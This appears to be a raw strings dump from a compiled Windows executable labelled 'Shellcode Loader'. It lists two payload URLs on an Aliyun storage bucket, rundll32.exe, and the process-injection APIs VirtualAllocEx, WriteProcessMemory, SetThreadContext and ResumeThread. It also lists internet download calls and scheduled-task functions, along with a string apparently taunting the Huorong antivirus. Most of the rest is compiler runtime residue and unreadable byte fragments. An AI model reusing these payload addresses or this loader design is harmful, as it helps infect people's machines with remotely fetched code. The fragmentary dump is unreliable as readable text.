!This program cannot be run in DOS mode.
SRich+
`.rdata
@.data
@.reloc
QQSVWd
uTVWh4g
^SSSSS
j@j ^V
URPQQh
t =MOC
Ht Hu4j
t*=RCC
;7|G;p
tR99u2
;t$,v-
UQPXY]Y[
t"SS9] u
vL;54>
<+t"<-t
+t HHt
PPPPPPPP
PPPPPPPP
NKagj(h
Unknown exception
bad allocation
SetThreadStackGuarantee
CorExitProcess
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
bad exception
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
(null)
`h````
xpxxxx
`h`hhh
xppwpp
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
1#QNAN
1#SNAN
https://uyul.oss-cn-beijing.aliyuncs.com/in/204.bin
rundll32.exe
https://uyul.oss-cn-beijing.aliyuncs.com/in/2041.bin
vector<T> too long
GetThreadContext
SetThreadContext
VirtualFree
VirtualFreeEx
CreateProcessA
TerminateProcess
VirtualAlloc
VirtualAllocEx
CloseHandle
WriteProcessMemory
ResumeThread
lstrlenA
InterlockedDecrement
MultiByteToWideChar
GetLocalTime
KERNEL32.dll
EnumDesktopsW
USER32.dll
CoCreateInstance
CoUninitialize
CoInitialize
ole32.dll
OLEAUT32.dll
InternetOpenW
InternetOpenUrlA
InternetQueryDataAvailable
InternetReadFile
InternetCloseHandle
WININET.dll
GetLastError
WideCharToMultiByte
LocalFree
EncodePointer
DecodePointer
HeapFree
HeapAlloc
VirtualProtect
GetProcAddress
GetModuleHandleW
GetSystemInfo
VirtualQuery
GetCurrentThreadId
GetCommandLineA
RtlUnwind
RaiseException
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
IsProcessorFeaturePresent
HeapSize
ExitProcess
HeapCreate
HeapDestroy
WriteFile
GetStdHandle
GetModuleFileNameW
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
InterlockedIncrement
SetLastError
SetHandleCount
InitializeCriticalSectionAndSpinCount
GetFileType
GetStartupInfoW
DeleteCriticalSection
GetModuleFileNameA
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
HeapReAlloc
LeaveCriticalSection
EnterCriticalSection
LoadLibraryW
SetFilePointer
GetConsoleCP
GetConsoleMode
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
SetStdHandle
WriteConsoleW
LCMapStringW
GetStringTypeW
CreateFileW
FlushFileBuffers
TASK.dll
Delete
DeleteFolder
IsEnable
IsExist
IsTaskValid
SetEnable
.?AV_com_error@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVexception@std@@
.?AVbad_alloc@std@@
.?AVCAtlException@ATL@@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
0Z0o0u0
1I1Y1~1
2!2;2H2T2
:I:[:t:z:
<E<Q<_<p<
=&=C=i=x=
>(>V>b>
3I4Y4n4
595I5^5
9(:-:<:i:
?$?+?3?8?<?@?i?
0 0$0(0,0
1I1P1T1X1\1`1d1h1l1
494?4Q4s4
4 585@5H5Q5X5
7;7@7J7~7
8 858g8
;E<]<b<
>1?d?m?r?x?|?
1'1,1<1A1G1M1c1j1b3g3
3"4+474t4z4
435;5N5Y5^5p5z5
9+9>9u9
:-:7:R:Z:`:n:
<H=Z=:>D>Q>
7B7d749
< <%<-<3<?<E<R<\<b<l<
=9=?=E=[=s=
>6>@>x>
? ?-?7?=?S?X?`?f?m?s?z?
0 0(0-040C0H0N0W0w0}0
1X1_1t1
2&2J2z2
3=3H3W3
9%9N9V9u9
:X;];o;
889C9I9n9t9y9M<
5c6i6u6
7$7*7M7T7m7
8.939m9r9y9~9
; ;&;0;6;@;I;T;Y;b;l;w;
=T>a>z>
3k4;5l5
8 8,888H8O8^8j8w8
939B9K9o9
<;<H<R<`<i<s<
0 0%0.030B0i0
1)1O1m1t1x1|1
1R2]2x2
3 3$3(3,3v3|3
4,5Y5d5
6<6I6N6\677Z7e7
?)?;?a?s?
0'090S1Z1
3s4g5o5 6
7@8F8T8
15595=5A5E5I5M5Q5U5Y5]5a5n506X6h6
<&<A<Q<b<t<
4@5D5H5
>$>,>4><>D>L>T>\>d>l>t>|>
P0T0X0\0 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
d6h6|6
7,707@7D7L7d7t7x7
9 949P9p9
:$:<:@:`:h:l:
;$;(;D;H;P;X;`;d;l;
< <@<`<
=(=H=d=h=
> >(>0>8>@>L>|>
?(?H?P?\?|?
000P0p0`2
3p:p;t;x;|;
<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
<0=@=P=`=p=
> >$>(>,>0>4>8><>@>D>
ekernel32.dll
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
- abort() has been called
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
KERNEL32.DLL
WUSER32.DLL
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
n(null)
((((( H
h(((( H
H
CONOUT$
Shellcode Loader
huorongbaba
%04d-%02d-%02dT%02d:%02d:%02d